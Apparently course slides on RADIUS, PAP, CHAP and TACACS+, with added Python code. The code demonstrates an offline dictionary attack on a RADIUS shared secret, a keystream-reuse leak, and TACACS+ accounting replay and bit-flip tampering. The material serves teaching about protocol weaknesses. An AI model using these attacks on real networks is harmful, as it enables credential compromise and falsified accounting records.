Authentication servers:
RADIUS
TACACS+
CS772
Fall 2007
                    RADIUS: authentication flow
• User initiates PPP authentication to the NAS.
• NAS prompts for username and password (if Password
  Authentication Protocol [PAP]) or sends a challenge (if Challenge
  Handshake Authentication Protocol [CHAP]).
• User replies.
• RADIUS client (the NAS) sends the username and the obfuscated password
  (User-Password XORed with an MD5 keystream derived from the shared
  secret) to the RADIUS server in an Access-Request.
• RADIUS server responds with Access-Accept, Access-Reject, or
  Access-Challenge.
• The RADIUS client acts on the services and service parameters
  bundled with the Accept or Reject.
                    Radius: Introduction
•   RADIUS (Remote Authentication Dial In User Service)
•   A server for remote user authentication and accounting. Its primary use is by Internet
    Service Providers, though it can be used on any network that needs a
    centralized authentication and/or accounting service for its workstations.
• http://www.gnu.org/software/radius/#introduction
•   Authentication Schemes:
     – the user supplies authentication data to the server, either directly by answering the terminal
        server's login/password prompts or through a PPP authentication exchange (PAP or CHAP)
     – the server obtains the user's personal data from one of the following places:
           •   System Database
                   – The user's login and password are stored in /etc/passwd on the server
           •   Internal Database
                   – The user's login ID, password etc. are stored in the internal radius database. The user's
                     password is stored in hashed form, using either an MD5 or a DES crypt hash, whichever is appropriate
           • SQL authentication
               – User's details are stored in an SQL database. The database structure is fully
                 determined by the system administrator; Radius does not restrict it in any way.
           • PAM authentication
                  – The user is authenticated via the PAM (Pluggable Authentication Modules) framework.
RADIUS – Introduction ( contd.)
• Radius has three built-in accounting schemes:
   – Unix accounting
      • Accounting data are stored in radutmp/radwtmp files and can be
        viewed using radwho and radlast commands. Both commands are
        upward compatible with their Unix counterparts who and last.
   – Detailed accounting
      • The detailed accounting information is stored in plain text format.
        The resulting files can easily be parsed using standard text
        processing tools (grep, awk, etc.)
   – SQL accounting
      • Upon receiving accounting information Radius stores it in an SQL
        database. This can then be processed using standard SQL queries.
• Radius is extensible and new accounting methods can
  be added using the extension language.
                   RADIUS Protocol
•   http://www.untruth.org/~josh/security/radius/radius-auth.html (Analysis)

• http://www.ietf.org/rfc/rfc2865.txt
  (specification)
               Why use RADIUS?
• It is commonly used for embedded network devices such as routers,
  modem servers, switches, etc. It is used for several reasons:

    – The embedded systems generally cannot store and manage a large number of
      users with distinct authentication information.
    – RADIUS facilitates centralized user administration, which is important
      for several of these applications. Many ISPs have tens of thousands,
      hundreds of thousands, or even millions of users.
    – RADIUS consistently provides some level of protection against an
      attacker who can sniff and modify traffic. Other remote authentication protocols provide
      either intermittent protection, inadequate protection or no protection at all.
      RADIUS's primary competition for remote authentication is
      TACACS+ and LDAP. LDAP without TLS natively provides no protection against
      sniffing or active attackers. TACACS+ is subtly flawed (see the Vulnerabilities
      slide below).
                     RADIUS Issues
•   The User-Password protection scheme is a stream cipher, where an MD5
    hash is used as an ad hoc pseudorandom number generator (PRNG): the password is
    zero-padded to a multiple of 16 bytes and each block is XORed with
    MD5(shared secret || previous ciphertext block), the first block using the
    16-byte Request Authenticator from the packet header in place of a previous block.
•   The scheme provides no integrity protection, and the security of the cipher rests on
    the strength of MD5 for this type of use, on the entropy of the shared secret, and on
    the Request Authenticator being unpredictable and never reused under the same secret.
    The reply is bound to the request only by a Response Authenticator,
    MD5(Code || ID || Length || Request Authenticator || Attributes || secret), which a
    passive observer can use as an offline test oracle for guesses at the secret.
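The following is an added example (not code from the slides or from any RADIUS implementation) that implements the User-Password hiding and Response Authenticator exactly as RFC 2865 specifies them, then shows the two consequences discussed above: a sniffed Access-Request/Access-Accept pair lets an attacker test candidate shared secrets offline, and a repeated Request Authenticator under the same secret leaks the XOR of two users' passwords. The secret, Request Authenticator, user names and password list are constructed sample values.

```python
"""RADIUS User-Password hiding (RFC 2865 s.5.2) and Response Authenticator
(RFC 2865 s.3), with the attacks that follow from building them on MD5.
Added example; not the slides' code and not any RADIUS server's code."""
import hashlib
import hmac
import struct

CODE_ACCESS_REQUEST, CODE_ACCESS_ACCEPT = 1, 2
ATTR_USER_NAME, ATTR_USER_PASSWORD = 1, 2


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def pad16(data: bytes) -> bytes:
    """Zero-pad to a multiple of 16 bytes, as the spec requires before hiding."""
    return data + b"\x00" * (-len(data) % 16)


def hide_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """c1 = p1 XOR MD5(S || RA); c_i = p_i XOR MD5(S || c_{i-1}).
    A stream cipher with MD5 as the keystream generator: no integrity, and any
    reuse of RA under the same secret reuses the first keystream block."""
    assert len(request_auth) == 16
    padded, out, prev = pad16(password), b"", request_auth
    for i in range(0, len(padded), 16):
        block = xor_bytes(padded[i:i + 16], hashlib.md5(secret + prev).digest())
        out, prev = out + block, block
    return out


def unhide_password(hidden: bytes, secret: bytes, request_auth: bytes) -> bytes:
    out, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        out += xor_bytes(hidden[i:i + 16], hashlib.md5(secret + prev).digest())
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")   # padding is indistinguishable from trailing NULs


def attribute(kind: int, value: bytes) -> bytes:
    return bytes([kind, len(value) + 2]) + value   # Type, Length, Value


def header(code: int, ident: int, authenticator: bytes, attrs: bytes) -> bytes:
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + authenticator + attrs


def access_request(ident, request_auth, user, password, secret):
    attrs = attribute(ATTR_USER_NAME, user) + attribute(
        ATTR_USER_PASSWORD, hide_password(password, secret, request_auth))
    return header(CODE_ACCESS_REQUEST, ident, request_auth, attrs)


def response_authenticator(code, ident, request_auth, attrs, secret):
    """MD5(Code || ID || Length || RequestAuth || Attributes || Secret): the only
    binding between reply and request, keyed by nothing but the secret."""
    return hashlib.md5(struct.pack("!BBH", code, ident, 20 + len(attrs))
                       + request_auth + attrs + secret).digest()


def access_accept(ident, request_auth, secret, attrs=b""):
    auth = response_authenticator(CODE_ACCESS_ACCEPT, ident, request_auth, attrs, secret)
    return header(CODE_ACCESS_ACCEPT, ident, auth, attrs)


def verify_response(response, request_auth, secret):
    """What the NAS does with a reply: recompute the Response Authenticator."""
    code, ident, length = struct.unpack("!BBH", response[:4])
    expected = response_authenticator(code, ident, request_auth, response[20:length], secret)
    return hmac.compare_digest(response[4:20], expected)


def recover_secret(request, response, candidates):
    """Offline dictionary attack: one sniffed request/response pair is a test
    oracle for the shared secret, with no further packets sent."""
    request_auth = request[4:20]
    for cand in candidates:
        if verify_response(response, request_auth, cand):
            return cand
    return None


def first_block_leak(hidden_a, hidden_b):
    """Same secret, repeated Request Authenticator: the first keystream blocks
    cancel, so c_a XOR c_b == p_a XOR p_b (padded)."""
    return xor_bytes(hidden_a[:16], hidden_b[:16])


if __name__ == "__main__":
    secret, ra = b"s3cret", bytes(range(16))      # constructed sample values
    req = access_request(7, ra, b"alice", b"hunter2", secret)
    rep = access_accept(7, ra, secret)
    print(verify_response(rep, ra, secret))
    print(recover_secret(req, rep, [b"radius", b"password", b"s3cret"]))
```

The dictionary attack is the reason the slide's "selection of the shared secret" matters: the secret is the only key in the system, and guessing it costs one MD5 per candidate with no rate limit. A long random secret per client, and a NAS that generates the Request Authenticator from a real CSPRNG rather than a counter or timestamp, are the two operational controls.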
       Side issue: Stream Ciphers
•   A stream cipher is a type of symmetric encryption algorithm. Stream ciphers can be designed to
    be exceptionally fast, often much faster than block ciphers.
•   While block ciphers operate on fixed-size blocks of data, stream ciphers typically operate on smaller
    units of plaintext, usually bits or bytes. With a stream cipher, the transformation of these smaller plaintext
    units varies depending on where they occur in the stream during the encryption process.
•   A stream cipher generates what is called a keystream (a sequence of bits used as a key).
    Encryption is accomplished by combining the keystream with the plaintext, usually with the bitwise
    XOR operation. Because XOR is malleable, flipping a ciphertext bit flips the same plaintext bit;
    a stream cipher on its own provides no integrity protection.
•   Current interest in stream ciphers is most commonly attributed to the appealing theoretical
    properties of the one-time pad. A one-time pad uses a string of bits that is generated completely at
    random. The keystream is the same length as the plaintext message and is
    combined using bitwise XOR with the plaintext to produce the ciphertext. Since the entire
    keystream is random and used only once, even an opponent with infinite computational resources can only guess the
    plaintext from the ciphertext.
•   Stream ciphers were developed as an approximation to the action of the one-time pad. While
    contemporary stream ciphers are unable to provide the theoretical security of the one-time
    pad, they are at least practical. Reusing a keystream (as happens when a RADIUS Request
    Authenticator repeats under the same shared secret) destroys even the practical security: the XOR of
    two ciphertexts is the XOR of the two plaintexts.
•   At the time of writing (2007) no stream cipher had emerged as a de facto standard and the most widely
    used one was RC4; RC4 has since been shown to have exploitable keystream biases, and RFC 7465
    prohibits its use in TLS. Certain modes of operation of a block cipher effectively
    transform it into a keystream generator, and in this way any block cipher can be used as a stream
    cipher, as with DES in CFB or OFB mode. However, stream ciphers with a dedicated design are
    typically faster.
                       Side Issue: PAP
•   Password Authentication Protocol, abbreviated PAP, is a simple
    authentication protocol used to authenticate a user to a network access server, used
    for example by Internet service providers. PAP is used by the Point-to-Point Protocol (PPP).
    Authentication is the process of validating a user before granting access to resources.
    Almost all network operating system remote servers support PAP.
•   PAP transmits unencrypted ASCII passwords over the link and is therefore
    considered insecure. It is used as a last resort when the remote server does not
    support a stronger authentication protocol, like CHAP or EAP (the latter is
    actually a framework).
•   PAP works as follows:
     – 1. After the link is established, the client sends the username and password to the server
       bundled in one PAP Authenticate-Request packet (PAP is negotiated by LCP but carried
       as its own PPP protocol).
     – 2. The server (the modem card in the modem racks) recognizes the packet as a PAP
       authentication request, and sends the data to the RADIUS server (the database of
       usernames and passwords).
     – 3. RADIUS either validates the request and sends back an acknowledgement to the
       modem card, terminates the connection, or offers the client another chance. Passwords
       are sent as plain text on the PPP link; between the NAS and the RADIUS server they are only
       hidden with the MD5-keystream scheme described above.
     – The difference between PAP authentication and a manual or scripted login is that PAP is
       not interactive. The username and password are entered in the client's dialing software
       and sent as one data package as soon as the modems have established a connection,
       rather than the server sending a login prompt and waiting for a response.
                Side Issue: CHAP
• CHAP (Challenge-Handshake Authentication Protocol) is a more
  secure procedure for connecting to a system than the Password
  Authentication Protocol (PAP).
• Here's how CHAP works:
   – After the link is made, the server sends a challenge message (a random value plus an
     Identifier byte) to the connection requestor. The requestor responds with a value obtained by
     running a one-way hash function (MD5 in the base specification) over the Identifier, the
     shared secret and the challenge value.
   – The server checks the response by comparing it to its own calculation of
     the expected hash value.
   – If the values match, the authentication is acknowledged; otherwise
     the connection is usually terminated.
• At any time, the server can send the connected party a new challenge. Because
  the challenge and Identifier change on every attempt and because re-authentication can
  be requested by the server at any time, a captured response cannot be replayed, and
  CHAP provides more security than PAP. The trade-off is that the server must hold the
  secret in a form from which it can recompute the hash, i.e. effectively in clear text.
  RFC 1334 originally defined both CHAP and PAP; CHAP is now specified by RFC 1994.
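Both sides of the CHAP exchange just described, as an added example that is not code from the slides or from any PPP implementation. It follows RFC 1994 (Response Value = MD5(Identifier || secret || Challenge Value); packet layout Code, Identifier, Length, Value-Size, Value, Name). The NAS name, user name, secret and fixed challenge values are constructed for the demonstration; a real authenticator would always draw the challenge from os.urandom as the default path does.

```python
"""CHAP challenge/response (RFC 1994, MD5 algorithm) with both peers modelled,
showing why a captured response does not replay against a fresh challenge.
Added example; not the slides' code.  Names and secrets are made up."""
import hashlib
import hmac
import os
import struct

CHALLENGE, RESPONSE, SUCCESS, FAILURE = 1, 2, 3, 4


def chap_value(ident: int, secret: bytes, challenge: bytes) -> bytes:
    """Response Value = MD5(Identifier || secret || Challenge Value)."""
    return hashlib.md5(bytes([ident]) + secret + challenge).digest()


def chap_packet(code: int, ident: int, value: bytes, name: bytes) -> bytes:
    """Code, Identifier, Length, Value-Size, Value, Name."""
    body = bytes([len(value)]) + value + name
    return struct.pack("!BBH", code, ident, 4 + len(body)) + body


def parse_chap(pkt: bytes):
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    size = pkt[4]
    return code, ident, pkt[5:5 + size], pkt[5 + size:length]


def chap_respond(challenge_pkt: bytes, name: bytes, secret: bytes) -> bytes:
    """Peer side: hash the challenge it was just sent under that packet's Identifier."""
    _, ident, challenge, _ = parse_chap(challenge_pkt)
    return chap_packet(RESPONSE, ident, chap_value(ident, secret, challenge), name)


class ChapAuthenticator:
    """Authenticator (NAS) side.  Secrets are kept in the clear because the
    authenticator must recompute MD5(ident || secret || challenge) itself."""

    def __init__(self, secrets):
        self.secrets, self.outstanding = secrets, {}

    def challenge(self, ident: int, challenge: bytes = None) -> bytes:
        challenge = challenge or os.urandom(16)         # fresh value per attempt
        self.outstanding[ident] = challenge
        return chap_packet(CHALLENGE, ident, challenge, b"nas1")

    def check(self, response_pkt: bytes) -> bool:
        code, ident, value, name = parse_chap(response_pkt)
        challenge = self.outstanding.pop(ident, None)   # each challenge answers once
        if code != RESPONSE or challenge is None or name not in self.secrets:
            return False
        expected = chap_value(ident, self.secrets[name], challenge)
        return hmac.compare_digest(value, expected)


if __name__ == "__main__":
    nas = ChapAuthenticator({b"alice": b"alice-secret"})
    resp = chap_respond(nas.challenge(1), b"alice", b"alice-secret")
    print(nas.check(resp), nas.check(resp))   # True, then False on replay
```

The `outstanding` table is what makes the replay fail: a response is only ever compared against the one challenge that is still open for its Identifier, and that entry is consumed on first use.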
                                 TACACS+
•   A major paradigm shift in remote network access is the shift from terminal access to LAN
    access. Single users are connecting to the corporate network with computers (notebooks or
    PCs from home) that can sustain complete network connections. These users no longer
    connect as dumb terminals but connect in the same way they do at work: as a LAN user.
•   TACACS+ (Terminal Access Controller Access-Control System Plus) is a protocol which
    provides access control for routers, network access servers (NAS) and other networked
    computing devices via one or more centralized servers. TACACS+ provides separate
    authentication, authorization and accounting services.
•   Whereas RADIUS combines authentication and authorization in a user profile, TACACS+
    separates the two operations. Another difference is that TACACS+ uses the Transmission
    Control Protocol (TCP) while RADIUS uses the User Datagram Protocol (UDP). TACACS+ is
    often recommended over RADIUS because TCP gives reliable, ordered delivery and a connection
    state the server can use. Note also that TACACS+ obfuscates the whole packet body, while
    RADIUS hides only the User-Password attribute.

• http://www.cisco.com/warp/public/614/7.html
•   Advantages of the TACACS+ Protocol (as listed by Cisco):
     – TCP-based, claimed to give more security
     – Provides three separate protocol components, each of which can be implemented on separate
        servers
•   Authentication provides complete server control of the authentication process, which includes:
     – login and password query
     – Challenge/response
     – Messaging support (any)
     – Packet body "encrypted" with an MD5-derived pad (an XOR keystream; see Vulnerabilities below)
     – Replaceable with Kerberos 5
•   Authorization allows "remote" access control and enhanced granularity.
    Features include:
     –   One authentication
     –   Authorization for each service
     –   Per-user access list and user profile
     –   Users can belong to groups
     –   IP and Telnet support (IPX, ARA future)
     –   Any access or command and permission or restrictions
                 Examples of the "AAA"
                     Functionality
•   The authorization component in TACACS+ allows greater levels of control over user
    actions and can be used to create separate administrative groups that are based on
    user function.
•   For example, a network manager might want to restrict a user to performing certain
    functions on the access server or router. Within the access server, a user might be
    restricted to PPP or SLIP and only be permitted to connect to a specific host address.
•   Another example of the flexibility of the authorization subsystem is forcing a user to
    connect to a particular host when an attempt is made to connect to some other host. In the
    case of the router's command line user interface, a restriction might be placed on
    executing particular EXEC commands such as reload.
•   The authorization reply can also carry an autocommand. Once a user is
    authenticated, this runs a chosen command within the access server system and is very
    powerful for complete access management. Network managers can use the
    accounting component to track user activity for a security audit trail or to provide
    billing information. A report might be structured to provide: user identity, start and
    stop times, executed commands, number of packets, and number of bytes.
•   Password aging is another example of the capabilities that are now available with
    TACACS+. A server supporting TACACS+ can send a message back to users, telling
    them to change their passwords as part of the login sequence. They will not be
    allowed access unless they change their passwords at that time.
                           Vulnerabilities
•   Lack of integrity checking. Almost no integrity checking exists in TACACS+. The only
    check defined in the draft specification is to make sure the sum of the component lengths
    matches the total size of the packet. Because the body is only XORed with an MD5-derived
    pad, an attacker can flip chosen bits of the body without knowing the key and the packet
    still passes that check.

•   Vulnerability to replay attacks.
     – TACACS+ lacks virtually any protection against replay attacks. The only requirement is
       that packets have a correct sequence number.
     – Since all TACACS+ sessions start with a sequence number of 1 (not a vulnerability in
       and of itself), the TACACS+ server will always process a packet with seq_no set to 1.
     – Especially easy to replay are accounting sessions, which consist of only one packet sent
       to the server (with a seq_no of 1). It is also possible to replay the packets with
       certain bits flipped, such as to get different task_ids in case a billing system is smart
       enough to check for duplicate records.
     – The fact that TACACS+ uses TCP provides no security against replay, as new TCP
       connections may be opened by an attacker for replaying recorded TACACS+ sessions.
     – The protocol has since been published as RFC 8907 (2020), whose security considerations
       state that the obfuscation is not encryption and that the protocol must only be deployed on
       a network that is itself protected from eavesdropping and packet injection.
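An added example, not code from the slides, Cisco, or any TACACS+ server, that builds a TACACS+ accounting START packet with the body obfuscation from the specification (pad_1 = MD5(session_id, key, version, seq_no); pad_n = MD5(session_id, key, version, seq_no, pad_n-1); body XOR pad) and models a server that performs only the length check the protocol defines. It then does what the two vulnerability bullets describe: replays the same single-packet accounting session, and flips one ciphertext bit so the same record is accepted with a different task_id. The key, session id, user, port, address and argument values are constructed for the demonstration.

```python
"""TACACS+ body obfuscation (chained MD5 pad XOR) plus the replay and
bit-flip consequences for single-packet accounting sessions.
Added example; not the slides', Cisco's, or any TACACS+ server's code."""
import hashlib
import struct

VERSION = 0xC0               # major version 0xC, minor version 0
TYPE_ACCOUNTING = 0x03
ACCT_FLAG_START = 0x02
HEADER = struct.Struct("!BBBBII")   # version, type, seq_no, flags, session_id, length


def pad(session_id: int, key: bytes, version: int, seq_no: int, length: int) -> bytes:
    """pad_1 = MD5(session_id || key || version || seq_no); pad_n = MD5(... || pad_{n-1})."""
    seed = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    out, prev = b"", b""
    while len(out) < length:
        prev = hashlib.md5(seed + prev).digest()
        out += prev
    return out[:length]


def obfuscate(body, session_id, key, version, seq_no):
    """XOR with the pad; the same call deobfuscates."""
    return bytes(b ^ p for b, p in zip(body, pad(session_id, key, version, seq_no, len(body))))


def acct_body(user, port, rem_addr, args, flags=ACCT_FLAG_START):
    """Accounting REQUEST body: fixed fields, one length byte per arg, then the strings.
    authen_method=TACACSPLUS (6), priv_lvl=1, authen_type=ASCII (1), service=LOGIN (1)."""
    fixed = struct.pack("!BBBBBBBBB", flags, 0x06, 1, 1, 1,
                        len(user), len(port), len(rem_addr), len(args))
    return fixed + bytes(len(a) for a in args) + user + port + rem_addr + b"".join(args)


def acct_packet(session_id, key, seq_no, body):
    hdr = HEADER.pack(VERSION, TYPE_ACCOUNTING, seq_no, 0, session_id, len(body))
    return hdr + obfuscate(body, session_id, key, VERSION, seq_no)


def parse_acct_body(body):
    """Server-side parse with exactly the check the spec defines: the component
    lengths must sum to the body length.  Nothing else is verified."""
    if len(body) < 9:
        return None
    flags, meth, priv, atype, svc, ulen, plen, rlen, argc = struct.unpack("!BBBBBBBBB", body[:9])
    alens = list(body[9:9 + argc])
    if len(alens) != argc or 9 + argc + ulen + plen + rlen + sum(alens) != len(body):
        return None
    off, fields = 9 + argc, []
    for n in (ulen, plen, rlen, *alens):
        fields.append(body[off:off + n])
        off += n
    return {"user": fields[0], "port": fields[1], "rem_addr": fields[2], "args": fields[3:]}


class AccountingServer:
    """Models the behaviour the analysis describes: a packet with seq_no 1 is
    always the start of a new session, so nothing stops the same record twice."""

    def __init__(self, key):
        self.key, self.records = key, []

    def receive(self, pkt):
        version, ptype, seq_no, flags, session_id, length = HEADER.unpack(pkt[:12])
        if ptype != TYPE_ACCOUNTING or seq_no != 1:
            return None
        rec = parse_acct_body(obfuscate(pkt[12:12 + length], session_id, self.key, version, seq_no))
        if rec is not None:
            self.records.append(rec)
        return rec


def flip_ciphertext(pkt, body_offset, mask):
    """Attacker edit: XOR one ciphertext byte; the plaintext byte flips identically."""
    out = bytearray(pkt)
    out[12 + body_offset] ^= mask
    return bytes(out)


def demo(key=b"sharedkey"):
    """Returns the task_id argument of every record the server accepted."""
    body = acct_body(b"alice", b"tty1", b"10.0.0.5", [b"task_id=1002", b"service=shell"])
    pkt = acct_packet(0x1234ABCD, key, 1, body)           # constructed session id
    srv = AccountingServer(key)
    srv.receive(pkt)                                      # genuine record
    srv.receive(pkt)                                      # straight replay: accepted again
    last_digit = body.index(b"task_id=1002") + len(b"task_id=100")
    srv.receive(flip_ciphertext(pkt, last_digit, 0x01))  # '2' -> '3' with no key knowledge
    return [r["args"][0] for r in srv.records]


if __name__ == "__main__":
    print(demo())   # [b'task_id=1002', b'task_id=1002', b'task_id=1003']
```

The attacker needs to know where `task_id=` sits in the body, but the body layout is fixed by the spec and the arg strings are at the end, so the offset is the same for every record of the same shape. The only defence the protocol itself offers is keeping the transport out of an attacker's reach; a billing system that de-duplicates on task_id alone does not help.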

						